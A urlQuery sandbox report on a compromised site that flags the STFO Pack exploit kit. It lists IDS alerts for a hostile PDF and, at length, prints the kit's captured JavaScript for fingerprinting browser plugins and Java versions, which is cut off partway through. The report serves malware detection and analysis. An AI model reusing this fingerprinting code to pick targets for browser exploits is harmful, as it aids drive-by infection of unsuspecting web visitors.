Overview

URLhttp://www.indiansites.in/beta/
IP74.54.95.210
ASNAS21844 ThePlanet.com Internet Services, Inc.
Location United States
Report completed2012-11-08 02:45:23 CET
StatusLoading report..
urlQuery Alerts Detected live STFO Pack exploit kit


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Source IP Destination IP Severity Alert
2012-11-08 02:44:41 109.163.239.216 urlQuery Client1ET CURRENT_EVENTS DRIVEBY PDF Containing Subform with JavaScript
2012-11-08 02:44:41 109.163.239.216 urlQuery Client1ET CURRENT_EVENTS Blackhole hostile PDF v2
2012-11-08 02:44:41 109.163.239.216 urlQuery Client3FILEMAGIC PDF document
Snort /w Sourcefire VRT
Timestamp Source IP Destination IP Severity Alert
2012-11-08 02:44:35 74.54.95.210 urlQuery Client3http_inspect: JAVASCRIPT WHITESPACES EXCEEDS MAX ALLOWED


Recent reports on same IP/ASN/Domain

Last 5 reports on IP: 74.54.95.210

Date Alerts / IDS URL IP
2013-03-23 17:30:421 / 0http://stopexcessivesweatingnow.com/74.54.95.210
2012-11-16 10:51:590 / 1http://indiansites.in/beta/detail/64/www-tamilmp3world-com-tamilmp3world-com-tamil-so (...)74.54.95.210
2012-11-16 07:44:160 / 1http://indiansites.in/beta/detail/1385/tolly-torrents-powered-by-vbulletin.html74.54.95.210
2012-11-16 07:31:010 / 1http://indiansites.in/beta/detail/421/desivideos-net-index-php-desi-videos.html74.54.95.210
2012-11-16 06:36:140 / 1http://indiansites.in/beta/detail/36/www-srungaram-com-the-e-magazine-for-telugu-peop (...)74.54.95.210

Last 6 reports on ASN: AS21844 ThePlanet.com Internet Services, Inc.

Date Alerts / IDS URL IP
2013-04-04 11:48:451 / 10http://eveningwiththeeditors.com/wp-content/plugins/wp-plugin-repo-stats/wps.php?c002174.120.7.157
2013-04-04 11:48:080 / 1http://www.free-slideshow-maker.net/FreePhotoSlideshowMaker.exe174.123.129.107
2013-04-04 11:44:180 / 1http://www.postsmile.com/files/summer.exe74.53.74.242
2013-04-04 11:42:521 / 3http://freedownloadestan.persianblog.ir/tag/dreamtemplate174.120.93.132
2013-04-04 11:42:110 / 2http://flipq.com/downloads/FlipQSetup-v2-33.exe74.55.178.157
2013-04-04 11:41:090 / 1http://etfhq.com/links/downloads-page.php174.120.247.61



JavaScript

Executed Scripts (26)

#26 JavaScript::Script (size: 30677, repeated: 1) - Alert detect on script (Severity: 1)

var stfo = {
    version: "0.7.8",
    name: "stfo",
    handler: function(c, b, a) {
        return function() {
            c(b, a)
        }
    },
    isDefined: function(b) {
        return typeof b != "undefined"
    },
    isArray: function(b) {
        return (/array/i).test(Object.prototype.toString.call(b))
    },
    isFunc: function(b) {
        return typeof b == "function"
    },
    isString: function(b) {
        return typeof b == "string"
    },
    isNum: function(b) {
        return typeof b == "number"
    },
    isStrNum: function(b) {
        return (typeof b == "string" && (/\d/).test(b))
    },
    getNumRegx: /[\d][\d\.\_,-]*/,
    splitNumRegx: /[\.\_,-]/g,
    getNum: function(b, c) {
        var d = this,
            a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).exec(b) : null;
        return a ? a[0] : null
    },
    compareNums: function(h, f, d) {
        var e = this,
            c, b, a, g = parseInt;
        if (e.isStrNum(h) && e.isStrNum(f)) {
            if (e.isDefined(d) && d.compareNums) {
                return d.compareNums(h, f)
            }
            c = h.split(e.splitNumRegx);
            b = f.split(e.splitNumRegx);
            for (a = 0; a < Math.min(c.length, b.length); a++) {
                if (g(c[a], 10) > g(b[a], 10)) {
                    return 1
                }
                if (g(c[a], 10) < g(b[a], 10)) {
                    return -1
                }
            }
        }
        return 0
    },
    formatNum: function(b, c) {
        var d = this,
            a, e;
        if (!d.isStrNum(b)) {
            return null
        }
        if (!d.isNum(c)) {
            c = 4
        }
        c--;
        e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
        for (a = 0; a < 4; a++) {
            if (/^(0+)(.+)$/.test(e[a])) {
                e[a] = RegExp.$2
            }
            if (a > c || !(/\d/).test(e[a])) {
                e[a] = "0"
            }
        }
        return e.slice(0, 4).join(",")
    },
    $$hasMimeType: function(a) {
        return function(c) {
            if (!a.isIE && c) {
                var f, e, b, d = a.isArray(c) ? c : (a.isString(c) ? [c] : []);
                for (b = 0; b < d.length; b++) {
                    if (a.isString(d[b]) && /[^\s]/.test(d[b])) {
                        f = navigator.mimeTypes[d[b]];
                        e = f ? f.enabledPlugin : 0;
                        if (e && (e.name || e.description)) {
                            return f
                        }
                    }
                }
            }
            return null
        }
    },
    findNavPlugin: function(l, e, c) {
        var j = this,
            h = new RegExp(l, "i"),
            d = (!j.isDefined(e) || e) ? /\d/ : 0,
            k = c ? new RegExp(c, "i") : 0,
            a = navigator.plugins,
            g = "",
            f, b, m;
        for (f = 0; f < a.length; f++) {
            m = a[f].description || g;
            b = a[f].name || g;
            if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))) {
                if (!k || !(k.test(m) || k.test(b))) {
                    return a[f]
                }
            }
        }
        return null
    },
    getMimeEnabledPlugin: function(k, m, c) {
        var e = this,
            f, b = new RegExp(m, "i"),
            h = "",
            g = c ? new RegExp(c, "i") : 0,
            a, l, d, j = e.isString(k) ? [k] : k;
        for (d = 0; d < j.length; d++) {
            if ((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)) {
                l = f.description || h;
                a = f.name || h;
                if (b.test(l) || b.test(a)) {
                    if (!g || !(g.test(l) || g.test(a))) {
                        return f
                    }
                }
            }
        }
        return 0
    },
    getPluginFileVersion: function(f, b) {
        var h = this,
            e, d, g, a, c = -1;
        if (h.OS > 2 || !f || !f.version || !(e = h.getNum(f.version))) {
            return b
        }
        if (!b) {
            return e
        }
        e = h.formatNum(e);
        b = h.formatNum(b);
        d = b.split(h.splitNumRegx);
        g = e.split(h.splitNumRegx);
        for (a = 0; a < d.length; a++) {
            if (c > -1 && a > c && d[a] != "0") {
                return b
            }
            if (g[a] != d[a]) {
                if (c == -1) {
                    c = a
                }
                if (d[a] != "0") {
                    return b
                }
            }
        }
        return e
    },
    AXO: window.ActiveXObject,
    getAXO: function(a) {
        var f = null,
            d, b = this,
            c = {};
        try {
            f = new b.AXO(a)
        } catch (d) {}
        return f
    },
    convertFuncs: function(f) {
        var a, g, d, b = /^[\$][\$]/,
            c = this;
        for (a in f) {
            if (b.test(a)) {
                try {
                    g = a.slice(2);
                    if (g.length > 0 && !f[g]) {
                        f[g] = f[a](f);
                        delete f[a]
                    }
                } catch (d) {}
            }
        }
    },
    initObj: function(e, b, d) {
        var a, c;
        if (e) {
            if (e[b[0]] == 1 || d) {
                for (a = 0; a < b.length; a = a + 2) {
                    e[b[a]] = b[a + 1]
                }
            }
            for (a in e) {
                c = e[a];
                if (c && c[b[0]] == 1) {
                    this.initObj(c, b)
                }
            }
        }
    },
    initScript: function() {
        var c = this,
            a = navigator,
            e = "/",
            f, i = a.userAgent || "",
            g = a.vendor || "",
            b = a.platform || "",
            h = a.product || "";
        c.initObj(c, ["$", c]);
        for (f in c.Plugins) {
            if (c.Plugins[f]) {
                c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1)
            }
        };
        c.OS = 100;
        if (b) {
            var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\s*PC", 22.3, "", 100];
            for (f = d.length - 2; f >= 0; f = f - 2) {
                if (d[f] && new RegExp(d[f], "i").test(b)) {
                    c.OS = d[f + 1];
                    break
                }
            }
        }
        c.convertFuncs(c);
        c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName("body")[0] || document.body || null);
        c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
        c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) : null;
        c.ActiveXEnabled = false;
        if (c.isIE) {
            var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper", "Scripting.Dictionary", "wmplayer.ocx"];
            for (f = 0; f < j.length; f++) {
                if (c.getAXO(j[f])) {
                    c.ActiveXEnabled = true;
                    break
                }
            }
        }
        c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
        c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 : "0.9") : null;
        c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
        c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
        c.isSafari = ((/Apple/i).test(g) || (!g && !c.isChrome)) && (/Safari\s*\/\s*(\d[\d\.]*)/i).test(i);
        c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum(RegExp.$1) : null;
        c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
        c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ? parseFloat(RegExp.$1, 10) : null;
        c.addWinEvent("load", c.handler(c.runWLfuncs, c))
    },
    init: function(d) {
        var c = this,
            b, d, a = {
                status: -3,
                plugin: 0
            };
        if (!c.isString(d)) {
            return a
        }
        if (d.length == 1) {
            c.getVersionDelimiter = d;
            return a
        }
        d = d.toLowerCase().replace(/\s/g, "");
        b = c.Plugins[d];
        if (!b || !b.getVersion) {
            return a
        }
        a.plugin = b;
        if (!c.isDefined(b.installed)) {
            b.installed = null;
            b.version = null;
            b.version0 = null;
            b.getVersionDone = null;
            b.pluginName = d
        }
        c.garbage = false;
        if (c.isIE && !c.ActiveXEnabled && d !== "java") {
            a.status = -2;
            return a
        }
        a.status = 1;
        return a
    },
    fPush: function(b, a) {
        var c = this;
        if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0])))) {
            a.push(b)
        }
    },
    callArray: function(b) {
        var c = this,
            a;
        if (c.isArray(b)) {
            for (a = 0; a < b.length; a++) {
                if (b[a] === null) {
                    return
                }
                c.call(b[a]);
                b[a] = null
            }
        }
    },
    call: function(c) {
        var b = this,
            a = b.isArray(c) ? c.length : -1;
        if (a > 0 && b.isFunc(c[0])) {
            c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
        } else {
            if (b.isFunc(c)) {
                c(b)
            }
        }
    },
    $$isMinVersion: function(a) {
        return function(h, g, d, c) {
            var e = a.init(h),
                f, b = -1,
                j = {};
            if (e.status < 0) {
                return e.status
            }
            f = e.plugin;
            g = a.formatNum(a.isNum(g) ? g.toString() : (a.isStrNum(g) ? a.getNum(g) : "0"));
            if (f.getVersionDone != 1) {
                f.getVersion(g, d, c);
                if (f.getVersionDone === null) {
                    f.getVersionDone = 1
                }
            }
            a.cleanup();
            if (f.installed !== null) {
                b = f.installed <= 0.5 ? f.installed : (f.installed == 0.7 ? 1 : (f.version === null ? 0 : (a.compareNums(f.version, g, f) >= 0 ? 1 : -0.1)))
            };
            return b
        }
    },
    getVersionDelimiter: ",",
    $$getVersion: function(a) {
        return function(g, d, c) {
            var e = a.init(g),
                f, b, h = {};
            if (e.status < 0) {
                return null
            };
            f = e.plugin;
            if (f.getVersionDone != 1) {
                f.getVersion(null, d, c);
                if (f.getVersionDone === null) {
                    f.getVersionDone = 1
                }
            }
            a.cleanup();
            b = (f.version || f.version0);
            b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
            return b
        }
    },
    cleanup: function() {
        var a = this;
        if (a.garbage && a.isDefined(window.CollectGarbage)) {
            window.CollectGarbage()
        }
    },
    addWinEvent: function(d, c) {
        var e = this,
            a = window,
            b;
        if (e.isFunc(c)) {
            if (a.addEventListener) {
                a.addEventListener(d, c, false)
            } else {
                if (a.attachEvent) {
                    a.attachEvent("on" + d, c)
                } else {
                    b = a["on" + d];
                    a["on" + d] = e.winHandler(c, b)
                }
            }
        }
    },
    winHandler: function(d, c) {
        return function() {
            d();
            if (typeof c == "function") {
                c()
            }
        }
    },
    WLfuncs0: [],
    WLfuncs: [],
    runWLfuncs: function(a) {
        var b = {};
        a.winLoaded = true;
        a.callArray(a.WLfuncs0);
        a.callArray(a.WLfuncs);
        if (a.onDoneEmptyDiv) {
            a.onDoneEmptyDiv()
        }
    },
    winLoaded: false,
    $$onWindowLoaded: function(a) {
        return function(b) {
            if (a.winLoaded) {
                a.call(b)
            } else {
                a.fPush(b, a.WLfuncs)
            }
        }
    },
    $$onDetectionDone: function(a) {
        return function(h, g, c, b) {
            var d = a.init(h),
                k, e, j = {};
            if (d.status == -3) {
                return -1
            }
            e = d.plugin;
            if (!a.isArray(e.funcs)) {
                e.funcs = []
            }
            if (e.getVersionDone != 1) {
                k = a.isMinVersion ? a.isMinVersion(h, "0", c, b) : a.getVersion(h, c, b)
            }
            if (e.installed != -0.5 && e.installed != 0.5) {
                a.call(g);
                return 1
            }
            if (e.NOTF) {
                a.fPush(g, e.funcs);
                return 0
            }
            return 1
        }
    },
    div: null,
    divID: "stfo",
    divWidth: 50,
    pluginSize: 1,
    emptyDiv: function() {
        var d = this,
            b, h, c, a, f, g;
        if (d.div && d.div.childNodes) {
            for (b = d.div.childNodes.length - 1; b >= 0; b--) {
                c = d.div.childNodes[b];
                if (c && c.childNodes) {
                    for (h = c.childNodes.length - 1; h >= 0; h--) {
                        g = c.childNodes[h];
                        try {
                            c.removeChild(g)
                        } catch (f) {}
                    }
                }
                if (c) {
                    try {
                        d.div.removeChild(c)
                    } catch (f) {}
                }
            }
        }
        if (!d.div) {
            a = document.getElementById(d.divID);
            if (a) {
                d.div = a
            }
        }
        if (d.div && d.div.parentNode) {
            try {
                d.div.parentNode.removeChild(d.div)
            } catch (f) {}
            d.div = null
        }
    },
    DONEfuncs: [],
    onDoneEmptyDiv: function() {
        var c = this,
            a, b;
        if (!c.winLoaded) {
            return
        }
        if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null) {
            return
        }
        for (a in c) {
            b = c[a];
            if (b && b.funcs) {
                if (b.OTF == 3) {
                    return
                }
                if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null) {
                    return
                }
            }
        }
        for (a = 0; a < c.DONEfuncs.length; a++) {
            c.callArray(c.DONEfuncs)
        }
        c.emptyDiv()
    },
    getWidth: function(c) {
        if (c) {
            var a = c.scrollWidth || c.offsetWidth,
                b = this;
            if (b.isNum(a)) {
                return a
            }
        }
        return -1
    },
    getTagStatus: function(m, g, a, b) {
        var c = this,
            f, k = m.span,
            l = c.getWidth(k),
            h = a.span,
            j = c.getWidth(h),
            d = g.span,
            i = c.getWidth(d);
        if (!k || !h || !d || !c.getDOMobj(m)) {
            return -2
        }
        if (j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1) {
            return 0
        }
        if (l >= i) {
            return -1
        }
        try {
            if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)) {
                if (!m.winLoaded && c.winLoaded) {
                    return 1
                }
                if (m.winLoaded && c.isNum(b)) {
                    if (!c.isNum(m.count)) {
                        m.count = b
                    }
                    if (b - m.count >= 10) {
                        return 1
                    }
                }
            }
        } catch (f) {}
        return 0
    },
    getDOMobj: function(g, a) {
        var f, d = this,
            c = g ? g.span : 0,
            b = c && c.firstChild ? 1 : 0;
        try {
            if (b && a) {
                d.div.focus()
            }
        } catch (f) {}
        return b ? c.firstChild : null
    },
    setStyle: function(b, g) {
        var f = b.style,
            a, d, c = this;
        if (f && g) {
            for (a = 0; a < g.length; a = a + 2) {
                try {
                    f[g[a]] = g[a + 1]
                } catch (d) {}
            }
        }
    },
    insertDivInBody: function(a, i) {
        var h, f = this,
            b = "pd33993399",
            d = null,
            j = i ? window.top.document : window.document,
            c = "<",
            g = (j.getElementsByTagName("body")[0] || j.body);
        if (!g) {
            try {
                j.write(c + 'div id="' + b + '">o' + c + "/div>");
                d = j.getElementById(b)
            } catch (h) {}
        }
        g = (j.getElementsByTagName("body")[0] || j.body);
        if (g) {
            if (g.firstChild && f.isDefined(g.insertBefore)) {
                g.insertBefore(a, g.firstChild)
            } else {
                g.appendChild(a)
            }
            if (d) {
                g.removeChild(d)
            }
        } else {}
    },
    insertHTML: function(g, b, h, a, l) {
        var m, n = document,
            k = this,
            q, p = n.createElement("span"),
            o, j, f = "<";
        var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin", "0px", "visibility", "visible"];
        var i = "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";
        if (!k.isDefined(a)) {
            a = ""
        }
        if (k.isString(g) && (/[^\s]/).test(g)) {
            g = g.toLowerCase().replace(/\s/g, "");
            q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" ';
            q += 'style="' + i + 'display:inline;" ';
            for (o = 0; o < b.length; o = o + 2) {
                if (/[^\s]/.test(b[o + 1])) {
                    q += b[o] + '="' + b[o + 1] + '" '
                }
            }
            q += ">";
            for (o = 0; o < h.length; o = o + 2) {
                if (/[^\s]/.test(h[o + 1])) {
                    q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />'
                }
            }
            q += a + f + "/" + g + ">"
        } else {
            q = a
        }
        if (!k.div) {
            j = n.getElementById(k.divID);
            if (j) {
                k.div = j
            } else {
                k.div = n.createElement("div");
                k.div.id = k.divID
            }
            k.setStyle(k.div, c.concat(["width", k.divWidth + "px", "height", (k.pluginSize + 3) + "px", "fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "block"]));
            if (!j) {
                k.setStyle(k.div, ["position", "absolute", "right", "0px", "top", "0px"]);
                k.insertDivInBody(k.div)
            }
        }
        if (k.div && k.div.parentNode) {
            k.setStyle(p, c.concat(["fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
            try {
                p.innerHTML = q
            } catch (m) {};
            try {
                k.div.appendChild(p)
            } catch (m) {};
            return {
                span: p,
                winLoaded: k.winLoaded,
                tagName: g,
                outerHTML: q
            }
        }
        return {
            span: null,
            winLoaded: k.winLoaded,
            tagName: "",
            outerHTML: q
        }
    },
    file: {
        $: 1,
        any: "fileStorageAny999",
        valid: "fileStorageValid999",
        save: function(d, f, c) {
            var b = this,
                e = b.$,
                a;
            if (d && e.isDefined(c)) {
                if (!d[b.any]) {
                    d[b.any] = []
                }
                if (!d[b.valid]) {
                    d[b.valid] = []
                }
                d[b.any].push(c);
                a = b.split(f, c);
                if (a) {
                    d[b.valid].push(a)
                }
            }
        },
        getValidLength: function(a) {
            return a && a[this.valid] ? a[this.valid].length : 0
        },
        getAnyLength: function(a) {
            return a && a[this.any] ? a[this.any].length : 0
        },
        getValid: function(c, a) {
            var b = this;
            return c && c[b.valid] ? b.get(c[b.valid], a) : null
        },
        getAny: function(c, a) {
            var b = this;
            return c && c[b.any] ? b.get(c[b.any], a) : null
        },
        get: function(d, a) {
            var c = d.length - 1,
                b = this.$.isNum(a) ? a : c;
            return (b < 0 || b > c) ? null : d[b]
        },
        split: function(g, c) {
            var b = this,
                e = b.$,
                f = null,
                a, d;
            g = g ? g.replace(".", "\.") : "";
            d = new RegExp("^(.*[^\/])(" + g + "\s*)$");
            if (e.isString(c) && d.test(c)) {
                a = (RegExp.$1).split("/");
                f = {
                    name: a[a.length - 1],
                    ext: RegExp.$2,
                    full: c
                };
                a[a.length - 1] = "";
                f.path = a.join("/")
            }
            return f
        },
        z: 0
    },
    Plugins: {
        java: {
            mimeType: ["application/x-java-applet", "application/x-java-vm", "application/x-java-bean"],
            classID: "clsid:8AD9C840-044E-11D1-B3E9-00805F499D93",
            navigator: {
                a: window.navigator.javaEnabled(),
                javaEnabled: function() {
                    return this.a
                },
                mimeObj: 0,
                pluginObj: 0
            },
            OTF: null,
            minIEver: 7,
            debug: 0,
            debugEnable: function() {
                var a = this,
                    b = a.$;
                a.debug = 1
            },
            isDisabled: {
                $: 1,
                DTK: function() {
                    var a = this,
                        c = a.$,
                        b = a.$$;
                    if ((c.isGecko && c.compareNums(c.verGecko, c.formatNum("1.6")) <= 0) || (c.isSafari && c.OS == 1 && (!c.verSafari || c.compareNums(c.verSafari, "5,1,0,0") < 0)) || c.isChrome || (c.isIE && !c.ActiveXEnabled)) {
                        return 1
                    }
                    return 0
                },
                AXO: function() {
                    var a = this,
                        c = a.$,
                        b = a.$$;
                    return (!c.isIE || !c.ActiveXEnabled || (!b.debug && b.DTK.query().status !== 0))
                },
                navMime: function() {
                    var b = this,
                        d = b.$,
                        c = b.$$,
                        a = c.navigator;
                    if (d.isIE || !a.mimeObj || !a.pluginObj) {
                        return 1
                    }
                    return 0
                },
                navPlugin: function() {
                    var b = this,
                        d = b.$,
                        c = b.$$,
                        a = c.navigator;
                    if (d.isIE || !a.mimeObj || !a.pluginObj) {
                        return 1
                    }
                    return 0
                },
                windowDotJava: function() {
                    var a = this,
                        c = a.$,
                        b = a.$$;
                    if (!window.java) {
                        return 1
                    }
                    if (c.OS == 2 && c.verOpera && c.verOpera < 9.2 && c.verOpera >= 9) {
                        return 1
                    }
                    if (c.verGecko && c.compareNums(c.verGecko, "1,9,0,0") < 0 && c.compareNums(c.verGecko, "1,8,0,0") >= 0) {
                        return 1
                    }
                    return 0
                },
                allApplets: function() {
                    var b = this,
                        d = b.$,
                        c = b.$$,
                        a = c.navigator;
                    if (d.OS >= 20) {
                        return 0
                    }
                    if (d.verOpera && d.verOpera < 11 && !a.javaEnabled() && !c.lang.System.getProperty()[0]) {
                        return 1
                    }
                    if ((d.verGecko && d.compareNums(d.verGecko, d.formatNum("2")) < 0) && !a.mimeObj && !c.lang.System.getProperty()[0]) {
                        return 1
                    }
                    return 0
                },
                AppletTag: function() {
                    var b = this,
                        d = b.$,
                        c = b.$$,
                        a = c.navigator;
                    return d.isIE ? !a.javaEnabled() : 0
                },
                ObjectTag: function() {
                    var a = this,
                        c = a.$,
                        b = a.$$;
                    return c.isIE ? !c.ActiveXEnabled : 0
                },
                z: 0
            },
            getVerifyTagsDefault: function() {
                var a = this,
                    c = a.$,
                    b = [1, 0, 1];
                if (c.OS >= 20) {
                    return b
                }
                if ((c.isIE && (c.verIE < 9 || !c.ActiveXEnabled)) || (c.verGecko && c.compareNums(c.verGecko, c.formatNum("2")) < 0) || (c.isSafari && (!c.verSafari || c.compareNums(c.verSafari, c.formatNum("4")) < 0)) || (c.verOpera && c.verOpera < 10)) {
                    b = [1, 1, 1]
                }
                return b
            },
            getVersion: function(j, g, i) {
                var b = this,
                    d = b.$,
                    e, a = b.applet,
                    h = b.verify,
                    k = b.navigator,
                    f = null,
                    l = null,
                    c = null;
                if (b.getVersionDone === null) {
                    b.OTF = 0;
                    k.mimeObj = d.hasMimeType(b.mimeType);
                    if (k.mimeObj) {
                        k.pluginObj = k.mimeObj.enabledPlugin
                    }
                    if (h) {
                        h.begin()
                    }
                }
                a.setVerifyTagsArray(i);
                d.file.save(b, ".jar", g);
                if (b.getVersionDone === 0) {
                    if (a.should_Insert_Query_Any()) {
                        e = a.insert_Query_Any();
                        b.setPluginStatus(e[0], e[1], f)
                    }
                    return
                }
                if ((!f || b.debug) && b.DTK.query().version) {
                    f = b.DTK.version
                }
                if ((!f || b.debug) && b.navMime.query().version) {
                    f = b.navMime.version
                }
                if ((!f || b.debug) && b.navPlugin.query().version) {
                    f = b.navPlugin.version
                }
                if ((!f || b.debug) && b.AXO.query().version) {
                    f = b.AXO.version
                }
                if (b.nonAppletDetectionOk(f)) {
                    c = f
                }
                if (!c || b.debug || a.VerifyTagsHas(2.2) || a.VerifyTagsHas(2.5)) {
                    e = b.lang.System.getProperty();
                    if (e[0]) {
                        f = e[0];
                        c = e[0];
                        l = e[1]
                    }
                }
                b.setPluginStatus(c, l, f);
                if (a.should_Insert_Query_Any()) {
                    e = a.insert_Query_Any();
                    if (e[0]) {
                        c = e[0];
                        l = e[1]
                    }
                }
                b.setPluginStatus(c, l, f)
            },
            nonAppletDetectionOk: function(b) {
                var d = this,
                    e = d.$,
                    a = d.navigator,
                    c = 1;
                if (!b || (!a.javaEnabled() && !d.lang.System.getPropertyHas(b)) || (!e.isIE && !a.mimeObj && !d.lang.System.getPropertyHas(b)) || (e.isIE && !e.ActiveXEnabled)) {
                    c = 0
                } else {
                    if (e.OS >= 20) {} else {
                        if (d.info && d.info.getPlugin2Status() < 0 && d.info.BrowserRequiresPlugin2()) {
                            c = 0
                        }
                    }
                }
                return c
            },
            setPluginStatus: function(d, f, a) {
                var c = this,
                    e = c.$,
                    b;
                a = a || c.version0;
                if (c.OTF > 0) {
                    d = d || c.lang.System.getProperty()[0]
                }
                if (c.OTF < 3) {
                    b = d ? 1 : (a ? -0.2 : -1);
                    if (c.installed === null || b > c.installed) {
                        c.installed = b
                    }
                }
                if (c.OTF == 2 && c.NOTF && !c.applet.getResult()[0] && !c.lang.System.getProperty()[0]) {
                    c.installed = a ? -0.2 : -1
                };
                if (c.OTF == 3 && c.installed != -0.5 && c.installed != 0.5) {
                    c.installed = (c.NOTF.isJavaActive(1) == 1 || c.lang.System.getProperty()[0]) ? 0.5 : -0.5
                }
                if (c.OTF == 4 && (c.installed == -0.5 || c.installed == 0.5)) {
                    if (d) {
                        c.installed = 1
                    } else {
                        if (c.NOTF.isJavaActive(1) == 1) {
                            if (a) {
                                c.installed = 1;
                                d = a
                            } else {
                                c.installed = 0
                            }
                        } else {
                            if (a) {
                                c.installed = -0.2
                            } else {
                                c.installed = -1
                            }
                        }
                    }
                };
                if (a) {
                    c.version0 = e.formatNum(e.getNum(a))
                }
                if (d) {
                    c.version = e.formatNum(e.getNum(d))
                }
                if (f && e.isString(f)) {
                    c.vendor = f
                }
                if (!c.vendor) {
                    c.vendor = ""
                }
                if (c.verify && c.verify.isEnabled()) {
                    c.getVersionDone = 0
                } else {
                    if (c.getVersionDone != 1) {
                        if (c.OTF < 2) {
                            c.getVersionDone = 0
                        } else {
                            c.getVersionDone = c.applet.can_Insert_Query_Any() ? 0 : 1
                        }
                    }
                }
            },
            DTK: {
                $: 1,
                hasRun: 0,
                status: null,
                VERSIONS: [],
                version: "",
                HTML: null,
                Plugin2Status: null,
                classID: ["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA", "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"],
                mimeType: ["application/java-deployment-toolkit", "application/npruntime-scriptable-plugin;DeploymentToolkit"],
                disabled: function() {
                    return this.$$.isDisabled.DTK()
                },
                query: function() {
                    var k = this,
                        g = k.$,
                        d = k.$$,
                        j, l, h, m = {},
                        f = {},
                        a, c = null,
                        i = null,
                        b = (k.hasRun || k.disabled());
                    k.hasRun = 1;
                    if (b) {
                        return k
                    }
                    k.status = 0;
                    if (g.isIE && g.verIE >= 6) {
                        for (l = 0; l < k.classID.length; l++) {
                            k.HTML = g.insertHTML("object", ["classid", k.classID[l]], []);
                            c = g.getDOMobj(k.HTML);
                            try {
                                if (c && c.jvms) {
                                    break
                                }
                            } catch (j) {}
                        }
                    } else {
                        if (!g.isIE && (h = g.hasMimeType(k.mimeType)) && h.type) {
                            k.HTML = g.insertHTML("object", ["type", h.type], []);
                            c = g.getDOMobj(k.HTML)
                        }
                    }
                    if (c) {
                        try {
                            a = c.jvms;
                            if (a) {
                                i = a.getLength();
                                if (g.isNum(i)) {
                                    k.status = i > 0 ? 1 : -1;
                                    for (l = 0; l < i; l++) {
                                        h = g.getNum(a.get(i - 1 - l).version);
                                        if (h) {
                                            k.VERSIONS.push(h);
                                            f["a" + g.formatNum(h)] = 1
                                        }
                                    }
                                }
                            }
                        } catch (j) {}
                    }
                    h = 0;
                    for (l in f) {
                        h++
                    }
                    if (h && h !== k.VERSIONS.length) {
                        k.VERSIONS = []
                    }
                    if (k.VERSIONS.length) {
                        k.version = g.formatNum(k.VERSIONS[0])
                    };
                    return k
                }
            },
            AXO: {
                $: 1,
                hasRun: 0,
                VERSIONS: [],
                version: "",
                disabled: function() {
                    return this.$$.isDisabled.AXO()
                },
                JavaVersions: [
                    [1, 9, 1, 40],
                    [1, 8, 1, 40],
                    [1, 7, 1, 40],
                    [1, 6, 0, 40],
                    [1, 5, 0, 30],
                    [1, 4, 2, 30],
                    [1, 3, 1, 30]
                ],
                query: function() {
                    var a = this,
                        e = a.$,
                        b = a.$$,
                        c = (a.hasRun || a.disabled());
                    a.hasRun = 1;
                    if (c) {
                        return a
                    }
                    var i = [],
                        k = [1, 5, 0, 14],
                        j = [1, 6, 0, 2],
                        h = [1, 3, 1, 0],
                        g = [1, 4, 2, 0],
                        f = [1, 5, 0, 7],
                        d = b.getInfo ? true : false,
                        l = {};
                    if (e.verIE >= b.minIEver) {
                        i = a.search(j, j, d);
                        if (i.length > 0 && d) {
                            i = a.search(k, k, d)
                        }
                    } else {
                        if (d) {
                            i = a.search(f, f, true)
                        }
                        if (i.length == 0) {
                            i = a.search(h, g, false)
                        }
                    }
                    if (i.length) {
                        a.version = i[0];
                        a.VERSIONS = [].concat(i)
                    };
                    return a
                },
                search: function(a, j, p) {
                    var h, d, f = this,
                        e = f.$,
                        k = f.$$,
